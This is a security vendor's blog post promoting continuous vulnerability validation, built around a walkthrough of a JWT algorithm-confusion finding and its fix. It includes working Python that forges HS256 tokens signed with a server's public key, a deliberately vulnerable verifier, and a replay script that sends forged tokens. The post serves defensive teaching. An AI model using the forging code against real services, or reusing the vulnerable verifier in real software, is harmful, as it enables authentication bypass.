This is the fifth piece in our attack-research series, and the most directly tied to the thesis CelvexGroup was built around. Our first four pieces walked specific attack patterns — SSRF into cloud metadata, JWT alg-confusion, OAuth state-parameter abuse, lateral movement at AI speed. This piece walks the operational pattern that lets a defender keep pace with all of them. Verifiable security. No screenshots. No "could not reproduce." No "we tested that last quarter."
Read this whether you are a CISO planning your validation programme for the next budget cycle, a head-of-security trying to get continuous validation onto next quarter's roadmap, or a CTO whose annual pentest just landed and was already stale by the time the report shipped.
The premise: continuous, not periodic
Three data points anchor the discussion.
First, mean time-to-exploit has gone negative: on average, exploitation now begins before the patch ships. Mandiant's M-Trends 2026 documents that exploitation of high-value vulnerabilities routinely begins before vendors issue patches. AI-assisted binary analysis and patch-diffing produce exploit code from pre-release candidates faster than the vendor's release pipeline can ship them. The defender who waits for the patch is, by definition, behind.
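To make "negative" concrete: if time-to-exploit is measured as the date of first observed exploitation minus the date the patch was released, every exploit that lands before the patch contributes a negative number, and enough of those pull the mean below zero. A minimal sketch of that arithmetic. The dates are invented for illustration and are not M-Trends data.

```python
from datetime import date
from statistics import mean


def time_to_exploit_days(patch_released: date, first_exploited: date) -> int:
    """Days from patch release to first observed exploitation (negative = before the patch)."""
    return (first_exploited - patch_released).days


# Invented (patch_released, first_exploited) pairs, for illustration only.
observations = [
    (date(2026, 3, 10), date(2026, 3, 1)),   # exploited 9 days before the patch
    (date(2026, 4, 2), date(2026, 3, 26)),   # exploited 7 days before the patch
    (date(2026, 5, 5), date(2026, 5, 6)),    # exploited 1 day after the patch
]

deltas = [time_to_exploit_days(p, e) for p, e in observations]
print(deltas, mean(deltas))  # [-9, -7, 1] -5
```

One late exploit does not rescue the average; the two pre-patch exploits dominate it.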
Second, CISA's KEV catalogue is adding actively exploited vulnerabilities at a sustained pace through 2026, and federal remediation deadlines are typically two to three weeks from KEV entry. The KEV is not a forecast of what could be exploited; it is a tape of what is being exploited, backed by confirmed in-the-wild observations. Public PoCs land within days for most KEV-listed CVEs.
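CISA publishes the KEV catalogue as a JSON feed. Each entry in its `vulnerabilities` array carries, among other fields, a `cveID`, a `dateAdded` and a `dueDate` (ISO dates). A minimal sketch that computes the remediation window per entry. The two records below are hypothetical placeholders shaped like feed entries. The live feed would be fetched and then parsed the same way.

```python
import json
from datetime import date

# Hypothetical excerpt shaped like the KEV JSON feed (placeholder IDs, not real entries).
SAMPLE_FEED = """
{"vulnerabilities": [
  {"cveID": "CVE-0000-0001", "dateAdded": "2026-04-01", "dueDate": "2026-04-22"},
  {"cveID": "CVE-0000-0002", "dateAdded": "2026-05-04", "dueDate": "2026-05-18"}
]}
"""


def remediation_windows(feed_json: str) -> dict[str, int]:
    """Map each CVE ID to the days between KEV entry and its federal due date."""
    feed = json.loads(feed_json)
    return {
        v["cveID"]: (date.fromisoformat(v["dueDate"]) - date.fromisoformat(v["dateAdded"])).days
        for v in feed["vulnerabilities"]
    }


print(remediation_windows(SAMPLE_FEED))  # {'CVE-0000-0001': 21, 'CVE-0000-0002': 14}
```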
Third, our own customer data: the median time from "we publish a Proof Capsule for a verified finding" to "engineering applies the fix" is 8.4 days. The distribution behind that median is strikingly bimodal. The customers who fix in hours have continuous-validation tooling and pre-approved fix-deployment authority; the customers who fix in weeks have neither. The customers in the second group are the ones who get hit.
What "continuous" actually means
The word "continuous" is overused. We mean something specific: a validation loop that runs against every customer-flagged asset, on a cadence shorter than the attacker's iteration cadence, with results that are reproducible by the customer's own engineers. Five characteristics distinguish the continuous-validation model from periodic pentesting.
| Dimension | Periodic pentest model | Continuous validation model |
|---|---|---|
| Cadence | Quarterly or annual | Weekly or daily; on-deploy where build infrastructure supports it |
| Output | PDF report, manually triaged | Signed Proof Capsule with replayable PoC; ticketed automatically |
| Reproducibility | Tester walks through it on a debrief call | Customer engineer runs replay.sh; binary VULNERABLE/PATCHED outcome |
| Coverage drift | Stale within weeks of report delivery | Re-validated every cycle; coverage tracked in dashboard |
| False-positive (FP) rejection | Triage thread; argument; "could not reproduce" | Replay primitive; either the exploit succeeds or it does not |
The fourth and fifth rows are the ones that matter for day-to-day operations. Coverage drift is the slow killer of every periodic-pentest programme: by the time the pentest report is read, prioritised, ticketed, and remediated, three months have passed, three deploys have shipped, and the threat landscape has moved. The remediation ends up verifying yesterday's posture against last year's threats. False-positive rejection is where you stop debating findings. The replay primitive ends the triage thread because the customer does not have to trust the pentester's note: they run the exploit themselves and watch what happens.
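Coverage drift can be tracked mechanically: an asset has drifted when it has been deployed since it was last validated. A minimal sketch, assuming a hypothetical inventory that records the last deploy time and last validation time for each asset. The `Asset` type, its fields and the hostnames are illustrative, not a product schema.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Optional


@dataclass
class Asset:
    name: str
    last_deployed: datetime
    last_validated: Optional[datetime]  # None means never validated


def drifted(assets: list[Asset]) -> list[str]:
    """Names of assets whose currently deployed build has not been validated."""
    return [
        a.name
        for a in assets
        if a.last_validated is None or a.last_deployed > a.last_validated
    ]


inventory = [
    Asset("api.example.com", datetime(2026, 5, 12, 14, 0), datetime(2026, 5, 12, 2, 0)),
    Asset("app.example.com", datetime(2026, 5, 11, 9, 0), datetime(2026, 5, 12, 2, 0)),
    Asset("new-staging.example.com", datetime(2026, 5, 12, 1, 0), None),
]
print(drifted(inventory))  # ['api.example.com', 'new-staging.example.com']
print(f"{len(drifted(inventory)) / len(inventory):.0%} drifted")  # 67% drifted
```

Under a quarterly pentest, nearly every asset that deploys at all ends up in this list for most of the quarter.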
What the loop looks like in practice
A concrete walkthrough of one validation cycle, from inside a customer engagement. The customer is a mid-market healthcare-data SaaS company with $60M ARR, running on AWS in three regions, with one security engineer plus two contractors. They onboarded with us six weeks ago and connected their staging environment to our continuous-validation pipeline.
00:00:00 — Cycle starts
Tuesday, 02:00 UTC. Our nightly research chain kicks off. The chain's first stage pulls the past 24 hours of public security disclosures — CISA KEV additions, vendor advisories from the customer's stack (AWS, Stripe, Okta, GitHub, Auth0, plus the open-source dependencies their SBOM lists), exploit-PoC repositories, and the security-research feed. New high-confidence items become candidate scanner-corpus updates.
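The first stage's 24-hour window is a simple filter on publication timestamps. A minimal sketch, assuming each source (KEV, vendor advisories, PoC repositories) has already been normalised into a hypothetical `Disclosure` record. The record type, the source labels and the identifiers are illustrative and do not come from any real feed schema.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class Disclosure:
    source: str          # e.g. "cisa-kev", "vendor-advisory", "poc-repo" (illustrative labels)
    identifier: str      # CVE ID or advisory ID
    published: datetime  # timezone-aware UTC timestamp


def last_24_hours(items: list[Disclosure], now: datetime) -> list[Disclosure]:
    """Keep disclosures published in the 24 hours up to and including `now`."""
    cutoff = now - timedelta(hours=24)
    return [d for d in items if cutoff < d.published <= now]


now = datetime(2026, 5, 12, 2, 0, tzinfo=timezone.utc)  # a Tuesday, 02:00 UTC
items = [
    Disclosure("cisa-kev", "CVE-0000-0003", datetime(2026, 5, 11, 17, 30, tzinfo=timezone.utc)),
    Disclosure("vendor-advisory", "ADV-0000-0001", datetime(2026, 5, 10, 9, 0, tzinfo=timezone.utc)),
]
print([d.identifier for d in last_24_hours(items, now)])  # ['CVE-0000-0003']
```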
00:04:00 — Corpus update
Two new candidates land. One is a CVE in a JWT library the customer uses (we know from an earlier pass over their dependency manifest). The other is a CISA KEV addition for a CMS plugin we have not seen on their attack surface but include in our standard scan corpus. Both get tagged into the next-pass corpus and ship into the scanner queue.
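Deciding which candidate targets this customer comes down, at its simplest, to checking each advisory's affected package and version range against the dependency manifest. A minimal sketch built on several assumptions. It uses a hypothetical advisory shape (package, first affected version, first fixed version), plain dotted numeric versions, and an SBOM flattened to a name-to-version map. Package names are illustrative. Real ecosystems need their own version-comparison rules.

```python
def parse_version(v: str) -> tuple[int, ...]:
    """Parse a plain dotted version like '3.1.4' into (3, 1, 4)."""
    return tuple(int(part) for part in v.split("."))


def is_affected(installed: str, introduced: str, fixed: str) -> bool:
    """True if introduced <= installed < fixed."""
    return parse_version(introduced) <= parse_version(installed) < parse_version(fixed)


def tag_candidates(advisories: list[dict], sbom: dict[str, str]) -> dict[str, str]:
    """Tag each advisory 'targeted' if it hits an SBOM component, else 'standard-corpus'."""
    tags = {}
    for adv in advisories:
        installed = sbom.get(adv["package"])
        hit = installed is not None and is_affected(installed, adv["introduced"], adv["fixed"])
        tags[adv["id"]] = "targeted" if hit else "standard-corpus"
    return tags


sbom = {"example-jwt-lib": "3.1.4", "example-http": "2.0.0"}  # hypothetical manifest
advisories = [
    {"id": "ADV-1", "package": "example-jwt-lib", "introduced": "3.0.0", "fixed": "3.2.0"},
    {"id": "ADV-2", "package": "example-cms-plugin", "introduced": "1.0.0", "fixed": "1.4.2"},
]
print(tag_candidates(advisories, sbom))  # {'ADV-1': 'targeted', 'ADV-2': 'standard-corpus'}
```

Both candidates still enter the scanner queue. The tag only records whether the customer's own manifest put the check there.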
00:09:00 — Recon pass
The recon stage walks the customer's flagged assets: 47 hostnames, 12 cloud accounts, 3 staging environments. Each gets fingerprinted for tech stack, library versions, exposed services, identity providers, and response-shape signatures. Nothing has changed dramatically since yesterday, but one new staging hostname appeared overnight. Our nightly chain noticed it and auto-flagged it for inclusion in the next scan pass; the security engineer will see it in the dashboard later that morning.
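Spotting the overnight hostname amounts to diffing today's fingerprinted inventory against yesterday's. A minimal sketch, assuming fingerprints are reduced to a hypothetical dict that maps each hostname to a few attributes. New hosts get auto-flagged, and changed fingerprints are reported alongside them. The hostnames and attribute names are illustrative.

```python
def diff_inventory(yesterday: dict[str, dict], today: dict[str, dict]) -> dict[str, list[str]]:
    """Compare two recon snapshots keyed by hostname."""
    new = sorted(today.keys() - yesterday.keys())
    gone = sorted(yesterday.keys() - today.keys())
    changed = sorted(h for h in today.keys() & yesterday.keys() if today[h] != yesterday[h])
    return {"new": new, "gone": gone, "changed": changed}


yesterday = {
    "api.example.com": {"server": "nginx", "idp": "okta"},
    "staging-1.example.com": {"server": "nginx", "idp": "auth0"},
}
today = {
    **yesterday,
    "staging-2.example.com": {"server": "envoy", "idp": "auth0"},
}
result = diff_inventory(yesterday, today)
print(result)  # {'new': ['staging-2.example.com'], 'gone': [], 'changed': []}
to_flag = result["new"]  # auto-flagged for the next scan pass
```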
00:18:00 — Scan pass
The scanner runs the full tagged corpus against the flagged assets. Most checks complete in seconds; the heavier ones (browser-driven UI flows, multi-step OAuth probes, replayable RCE chains) take considerably longer. For a mid-sized environment like this one, the full pass takes roughly 90 minutes. Findings post into the validation queue as they are confirmed, not at the end of the pass.
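Posting findings as they confirm, instead of after the full 90-minute pass, is what lets a minute-42 finding page someone at minute 42. A minimal sketch of that pattern using `asyncio.as_completed`. The check coroutine, the check names and the durations are hypothetical stand-ins for real probes.

```python
import asyncio


async def run_check(name: str, seconds: float, vulnerable: bool) -> tuple[str, bool]:
    """Stand-in for a real probe: wait, then report whether it confirmed."""
    await asyncio.sleep(seconds)
    return name, vulnerable


async def scan_pass(checks: list[tuple[str, float, bool]], post_finding) -> None:
    """Run checks concurrently and post each confirmed finding the moment it completes."""
    tasks = [asyncio.create_task(run_check(*c)) for c in checks]
    for next_done in asyncio.as_completed(tasks):
        name, vulnerable = await next_done
        if vulnerable:
            post_finding(name)  # e.g. hand off to capsule generation and notification


posted: list[str] = []
checks = [("slow-oauth-flow", 0.05, False), ("jwt-alg-confusion", 0.01, True)]
asyncio.run(scan_pass(checks, posted.append))
print(posted)  # ['jwt-alg-confusion']
```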
00:42:00 — Finding confirmed
The new JWT-library check fires. The customer's authentication service accepts a forged token signed with the public key as the HMAC secret: the alg-confusion variant we walked through in our companion piece. The scanner captures the request/response evidence, generates a Proof Capsule with a replay.sh script, signs it, and posts it into the customer's dashboard. The capsule includes the exact remediation steps for the affected library version.
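For readers who skipped the companion piece, here is how such a token is built. A minimal, standard-library-only sketch of the alg-confusion pattern. The attacker sets the header's `alg` to `HS256` and signs with the server's *public* key bytes as the HMAC secret. A verifier that takes the algorithm from the token header, and hands the same key material to HMAC, accepts the result. `naive_verify` is a hypothetical vulnerable verifier written for illustration, not any specific library's code, and the PEM bytes are a placeholder.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWTs use."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def forge_hs256(claims: dict, public_key_pem: bytes) -> str:
    """Sign claims with HS256, using the RSA public key bytes as the HMAC secret."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = hmac.new(public_key_pem, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def naive_verify(token: str, key: bytes) -> Optional[dict]:
    """VULNERABLE: chooses the algorithm from the attacker-controlled header."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header["alg"] == "HS256":
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    # A real verifier would check RS256 with the public key here; omitted in this sketch.
    return None


PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nplaceholder\n-----END PUBLIC KEY-----\n"
token = forge_hs256({"sub": "attacker", "scope": "admin"}, PUBLIC_KEY_PEM)
print(naive_verify(token, PUBLIC_KEY_PEM))  # {'sub': 'attacker', 'scope': 'admin'}
```

The public key is, by definition, public. So anyone can produce a signature that this verifier accepts.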
00:42:30 — Customer notification
Thirty seconds after confirmation, the security engineer's pager goes off. (This customer wires us into their on-call rotation; not every customer does, and that is a legitimate choice.) The dashboard URL is in the page. They open it from bed and see the Proof Capsule, the severity (high), and the remediation summary.
00:46:00 — Replay
From bed, on a laptop, the security engineer runs replay.sh against their staging environment. The script forges the JWT and sends it; the staging API returns a 200 with admin-scoped data. VULNERABLE. They have confirmed the finding themselves, in their own environment, roughly four minutes after the page fired.
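The binary outcome is what makes the replay useful for triage. Below is a minimal Python sketch of the decision a script like replay.sh might encode. It assumes, hypothetically, that a 2xx response to the forged token means VULNERABLE and a 401 or 403 means PATCHED. Anything else is reported as inconclusive rather than forced into either bucket. The endpoint URL is a placeholder. The actual Proof Capsule format may define its outcomes differently.

```python
import urllib.error
import urllib.request


def classify(status: int) -> str:
    """Map the HTTP status of the forged-token request to a replay outcome."""
    if 200 <= status < 300:
        return "VULNERABLE"
    if status in (401, 403):
        return "PATCHED"
    return "INCONCLUSIVE"


def replay(url: str, forged_token: str, timeout: float = 10.0) -> str:
    """Send the forged token as a Bearer credential and classify the response."""
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {forged_token}"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status)
    except urllib.error.HTTPError as err:  # urlopen raises on 4xx/5xx responses
        return classify(err.code)
    except urllib.error.URLError:  # connection-level failures (DNS, refused connection)
        return "INCONCLUSIVE"


# replay("https://staging.example.internal/api/admin/me", token)  # hypothetical endpoint
```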
00:51:00 — Triage decision
Staging confirmed the finding and production runs the same library version, so they treat production as vulnerable too. They wake the on-call platform engineer and jointly decide that this is not waiting for tomorrow morning. The fix is a one-parameter change in the JWT validator configuration, plus a library upgrade that landed in the vendor's release last week.
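A one-parameter fix for alg confusion usually pins the accepted algorithm server-side instead of reading it from the token. In PyJWT, for example, that pinning is the `algorithms=["RS256"]` argument to `jwt.decode`. A minimal standard-library sketch of the hardened verifier shape: it rejects any token whose header `alg` is outside an explicit allowlist before any signature check runs. The RS256 check itself is a hypothetical callback, because the Python standard library has no RSA verification. `make_token` and `accept_any` exist only for the demo.

```python
import base64
import json
from typing import Callable, Optional

ALLOWED_ALGS = {"RS256"}  # pinned in server config; never read from the token


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def pinned_verify(token: str, verify_rs256: Callable[[bytes, bytes], bool]) -> Optional[dict]:
    """Reject any token whose header alg is not allowlisted, then verify with RS256 only."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") not in ALLOWED_ALGS:
        return None  # the HS256 forgery (and "none") is rejected before any crypto runs
    signing_input = f"{header_b64}.{payload_b64}".encode()
    if not verify_rs256(signing_input, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def make_token(alg: str, claims: dict, sig: bytes) -> str:
    """Assemble a token with an arbitrary header alg, for the demo below."""
    parts = [json.dumps({"alg": alg, "typ": "JWT"}).encode(), json.dumps(claims).encode(), sig]
    return ".".join(b64url_encode(p) for p in parts)


def accept_any(msg: bytes, sig: bytes) -> bool:
    """Deliberately broken signature check, to show the allowlist alone stops HS256."""
    return True


print(pinned_verify(make_token("HS256", {"sub": "attacker"}, b"forged"), accept_any))  # None
```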
01:15:00 — Fix shipped
The platform engineer ships the validator-config change to production as a hotfix. The library upgrade goes through the next normal release window, 09:00 local time later that morning. Until then, the validator-config change is enough: it closes the variant the scanner caught.
01:18:00 — Re-validation
The customer re-runs replay.sh against production. The same forged JWT now returns a 401 instead of a 200. PATCHED. The dashboard records a verified-fix event with a timestamp, the engineer's identity, and the replay's signed output. The auditor record is built automatically.
The cycle, total: 78 minutes
From ingesting the disclosure to a verified fix: 78 minutes. The replay-and-verify portion of the cycle, from the moment the engineer was awake and at a laptop, was 32 minutes. That is close to our "thirty-second" headline if you scope it down to engineer-active time rather than wall-clock time. The phrase is shorthand for the principle, not a literal claim about every cycle. The principle is that the cycle can take minutes, not weeks, when the tooling is right and the authority is pre-decided.
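The arithmetic behind those figures, using the cycle-relative timestamps from the walkthrough. The dictionary keys are just labels for this sketch.

```python
from datetime import timedelta


def t(hms: str) -> timedelta:
    """Parse a cycle-relative HH:MM:SS timestamp."""
    h, m, s = (int(x) for x in hms.split(":"))
    return timedelta(hours=h, minutes=m, seconds=s)


timeline = {
    "cycle_start": t("00:00:00"),
    "finding_confirmed": t("00:42:00"),
    "page_fired": t("00:42:30"),
    "replay_run": t("00:46:00"),
    "fix_shipped": t("01:15:00"),
    "revalidated": t("01:18:00"),
}


def minutes(start: str, end: str) -> float:
    """Elapsed minutes between two named events."""
    return (timeline[end] - timeline[start]).total_seconds() / 60


print(minutes("cycle_start", "revalidated"))       # 78.0
print(minutes("replay_run", "revalidated"))        # 32.0
print(minutes("finding_confirmed", "page_fired"))  # 0.5
```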
What it forces in your engineering organisation
Continuous validation is a tooling change, but it is also an operational change, and the operational change is the harder one. The customer engagements that make this work share four characteristics; the ones that struggle are missing at least two.
- Pre-approved fix-deployment authority for the top decile of finding severity. If shipping a one-line validator-config change to production requires a CAB review, four sign-offs, and a Tuesday-morning deployment window, the value of catching the vulnerability at 02:42 UTC evaporates. The engineering org has to have pre-approved that the on-call platform engineer ships hotfixes for confirmed high-severity findings, against a defined runbook, with an audit log. This is a governance change, not a technical change, and it is usually the longest pole.
- Replay-driven triage instead of triage-thread arguments. The Proof Capsule format exists specifically to take the FP-rejection thread off the table. The customer's engineer does not argue with our writeup; they run the script and watch what happens. Stop debating findings. The triage culture has to change to "did the replay succeed?" rather than "do I think this is real?" The cultural change is real and takes a few cycles to land.
- Continuous validation as a build-pipeline citizen, not a separate vendor relationship. The teams that get the most value out of us are the ones who treat our findings as build artefacts — ticketed automatically, blocking on production deploys when the severity is high enough, dashboarded in the same place engineering looks at every other build signal. The teams who treat us as a separate dashboard they check on Wednesdays get less value.
- Cadence calibrated to deploy frequency. If you ship to production once a week, weekly validation is enough. If you ship continuously, validation should ride the deploy. We do both; the customer's deploy cadence drives the choice. The single worst configuration is "we deploy ten times a day, but we validate quarterly," which is the default at most mid-market shops.
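Two of these characteristics translate directly into pipeline logic. A minimal sketch, assuming a hypothetical export of open findings, each with a severity and the outcome of its last replay. The gate fails the deploy step while any high-or-critical finding still replays VULNERABLE. The cadence helper encodes the rule that validation rides the deploy. The thresholds, field names and the `load_open_findings` helper are illustrative, not a product configuration.

```python
BLOCKING_SEVERITIES = {"critical", "high"}


def deploy_allowed(findings: list[dict]) -> bool:
    """False if any high-or-critical finding still replays VULNERABLE."""
    return not any(
        f["severity"] in BLOCKING_SEVERITIES and f["replay_outcome"] == "VULNERABLE"
        for f in findings
    )


def gate_exit_code(findings: list[dict]) -> int:
    """CI convention: 0 lets the deploy proceed, non-zero fails the step."""
    return 0 if deploy_allowed(findings) else 1


def validation_cadence(deploys_per_week: float) -> str:
    """Illustrative thresholds: validation rides the deploy once deploys are frequent."""
    if deploys_per_week > 7:
        return "on-deploy"
    if deploys_per_week > 1:
        return "daily"
    return "weekly"


open_findings = [
    {"id": "F-1", "severity": "high", "replay_outcome": "PATCHED"},
    {"id": "F-2", "severity": "medium", "replay_outcome": "VULNERABLE"},
]
print(gate_exit_code(open_findings))  # 0
# In CI: sys.exit(gate_exit_code(load_open_findings()))  # load_open_findings is hypothetical
```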
What continuous validation does not replace
We are honest about the boundary. Continuous validation does not replace the following, and we will say so to anyone who asks.
- It does not replace incident response. If an attacker is mid-engagement in your environment, the right tool is your IR team, not a scanner. We surface vulnerabilities; we do not detect breach-in-progress.
- It does not replace identity-and-behavioural analytics. The lateral-movement-at-AI-speed problem we walked in the companion piece requires telemetry-driven detection, and that is a different discipline. Our findings tell you which doors are unlocked; behavioural analytics tells you when someone walks through one.
- It does not replace human red-teaming for high-stakes engagements. The novel attack chain that requires creative reasoning, social engineering, or business-logic abuse is still in the human red-team's domain. Our automation catches the breadth of attack patterns; the human catches the depth on the engagements that warrant deep investment.
- It does not replace governance, risk, and compliance work. SOC 2 Type II, ISO 27001, HIPAA, GDPR — these are programmes our findings feed, not programmes we replace.
Where CelvexGroup is on this curve today
We are direct about our maturity and our roadmap. Customers are buying continuous validation; they should know exactly what they are buying.
- L1.5 today. Tagged scanner corpus across roughly 5,300 attack tests, 38 of 60 profile-gated for customer-environment scoping. Signed Proof Capsules with replayable replay.sh primitives for the major attack classes. Continuous external validation against customer-flagged assets. Sub-hour cycle from finding confirmation to customer notification, where the customer wires the integration. Honest about which checks are hand-tuned and which are auto-mutated.
- L2 in 90 days. Multi-step chain validation across connected findings (e.g., the SSRF that leads to the metadata-token theft that leads to the bucket exfil, validated as a chain rather than as three independent findings). On-deploy scanner integration in customer build pipelines. Replay primitives that handle authenticated post-login attack surface, not just unauthenticated probes.
- L3 in 12 months. Autonomous probe-mutation against unfamiliar customer infrastructure. The scanner discovers a new endpoint shape it has not seen before, synthesises probes specific to that shape, validates them, and reports. Today this requires human-in-the-loop. In twelve months we believe it will not.
We do not claim L3 capability today. We do not claim L2 capability today. We claim L1.5 today and we will say so on the day we level up. Proof beats promises. The Capsule is the proof.
The framework, applied at the programme level
Find. Prove. Fix. Verify. — as a programme, not a project.
- Find. Continuous external validation, weekly cadence minimum, against every customer-flagged asset. Corpus updated with new public disclosures within 24 hours.
- Prove. Every finding ships with a signed, replayable Proof Capsule. The customer's engineers reproduce the exploit themselves. No screenshots. No "could not reproduce."
- Fix. Pre-approved fix-deployment authority for high-severity confirmed findings. The Capsule's remediation block points at the specific code, config, or version change.
- Verify. Re-run the Capsule's replay primitive after the fix lands. A PATCHED outcome closes the finding automatically. The auditor record is built as a byproduct.
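The four stages map naturally onto a small per-finding state machine. A minimal sketch, assuming hypothetical state names and an in-memory audit log. A finding can only reach CLOSED through a PATCHED replay. Any other replay outcome sends it back to PROVEN. Every transition appends a timestamped audit entry naming the actor, which is one way the auditor record falls out as a byproduct.

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Allowed transitions: Find -> Prove -> Fix -> Verify (closed only via a PATCHED replay).
TRANSITIONS = {
    "FOUND": {"PROVEN"},
    "PROVEN": {"FIX_DEPLOYED"},
    "FIX_DEPLOYED": {"CLOSED", "PROVEN"},
}


@dataclass
class Finding:
    finding_id: str
    state: str = "FOUND"
    audit: list[dict] = field(default_factory=list)

    def advance(self, new_state: str, actor: str) -> None:
        """Move to new_state if allowed, recording who did it and when."""
        if new_state not in TRANSITIONS.get(self.state, set()):
            raise ValueError(f"{self.state} -> {new_state} not allowed")
        self.audit.append({
            "at": datetime.now(timezone.utc).isoformat(),
            "actor": actor,
            "from": self.state,
            "to": new_state,
        })
        self.state = new_state

    def record_replay(self, outcome: str, actor: str) -> None:
        """Verify step: PATCHED closes the finding; any other outcome reopens it."""
        self.advance("CLOSED" if outcome == "PATCHED" else "PROVEN", actor)


f = Finding("jwt-alg-confusion")
f.advance("PROVEN", actor="scanner")
f.advance("FIX_DEPLOYED", actor="platform-oncall")
f.record_replay("PATCHED", actor="security-engineer")
print(f.state, len(f.audit))  # CLOSED 3
```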
The one-page board summary
Continuous-validation programme — board read
- Why now: mean time-to-exploit is negative; quarterly pentests are calibrated for an adversary that does not exist.
- What it is: a validation loop that probes every flagged asset weekly or faster, with reproducible Proof Capsules instead of PDF reports.
- What it costs: tooling (modest); operational changes including pre-approved fix authority for high-severity findings (significant, but one-time).
- What it replaces: the quarterly pentest, partially.
- What it does not replace: IR, identity-and-behavioural analytics, human red-teaming, governance work.
- How you measure success: median time from finding-confirmation to fix-deployed; reduction in coverage-drift between cycles; verified-fix events as auditor evidence.
- What you ask the next vendor: "show me the replay primitive" and "what is your maturity level on the autonomy curve, and how do you measure it?" Vendors who cannot answer either question crisply are not selling continuous validation; they are selling a periodic-pentest service with a fancier name.
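The first success metric falls straight out of the audit trail. A minimal sketch, assuming hypothetical (confirmed, fix-deployed) timestamp pairs, one per finding. The median is used rather than the mean because fix times are skewed (bimodal, in our data), so a few slow fixes would otherwise dominate the number. The timestamps are illustrative, not customer data.

```python
from datetime import datetime
from statistics import median


def median_hours_to_fix(pairs: list[tuple[datetime, datetime]]) -> float:
    """Median hours from finding confirmation to verified fix deployment."""
    return median((fixed - confirmed).total_seconds() / 3600 for confirmed, fixed in pairs)


pairs = [
    (datetime(2026, 5, 12, 2, 42), datetime(2026, 5, 12, 3, 15)),  # hotfixed overnight
    (datetime(2026, 5, 1, 10, 0), datetime(2026, 5, 15, 10, 0)),   # two weeks in a queue
    (datetime(2026, 5, 3, 9, 0), datetime(2026, 5, 3, 13, 0)),     # same-day fix
]
print(median_hours_to_fix(pairs))  # 4.0
```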
Bottom line
The threat ecosystem of 2026 has industrialised, specialised, and accelerated. The defensive model that worked in 2018 — periodic external assessment, manual triage, quarterly cadence — is calibrated for an adversary that no longer exists. The model that works against the current adversary is continuous, reproducible, and integrated into the engineering organisation as a build-pipeline citizen rather than a vendor dashboard. The change is uncomfortable. The change is operational, not just technical. The change is necessary.
CelvexGroup ships the tooling for the cycle today, at L1.5, with an honest roadmap to L2 and L3. The operational change — pre-approved fix authority, replay-driven triage, build-pipeline integration — is yours to make. We help where we can. We say so where we cannot.
Verifiable security. Find. Prove. Fix. Verify. Stop debating findings. Run the replay. Watch what happens. Fix it. Re-run. Watch the fix hold. That is the loop. That is what we ship.
Sources
- Google Cloud / Mandiant — M-Trends 2026: Data, Insights, and Strategies From the Frontlines
- Ciphers Security — AI Industrializes Cybercrime as Mean Time-to-Exploit Hits Negative Seven Days
- CISA — Known Exploited Vulnerabilities (KEV) Catalog
- The Hacker News — CISA Adds Actively Exploited ConnectWise and Windows Flaws to KEV (April 2026)
- The Hacker News — CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV (May 2026)
- Help Net Security — Attackers handing off access in 22 seconds, Mandiant finds
- CELVEX Group — Proof Capsule format
- CELVEX Group — How it works
See the cycle for yourself.
Free Exposure Check — sixty seconds, no signup. We probe your external attack surface, ship a signed Proof Capsule for the highest-confidence finding, and your engineer runs the replay against your own asset. Watch the cycle work end-to-end before you talk to us again.